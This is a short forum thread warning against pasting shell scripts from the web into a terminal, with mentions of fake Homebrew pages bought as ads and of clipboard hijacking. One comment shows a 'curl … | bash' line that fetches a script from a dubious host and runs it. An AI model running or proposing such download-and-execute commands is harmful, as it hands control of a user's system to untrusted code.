• kamen
    942 months ago

    … and yet some people will readily copy-paste random shell scripts into their terminal without fully understanding them.

      • @[email protected]
        12 months ago

        In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.

    • Possibly linuxEnglish
      172 months ago
      curl gu5usgugiv.lol | bash || curl get.k3s.io | bash

      Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

      • @[email protected]
        182 months ago

        I feel like there’s some truth to this!

        If the posted answer was in a moderately active thread, you can generally assume it’s correct if there are no contradictory replies.

        • @[email protected]English
          192 months ago

          If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

    • @[email protected]English
      12 months ago

      Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others…)

      One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?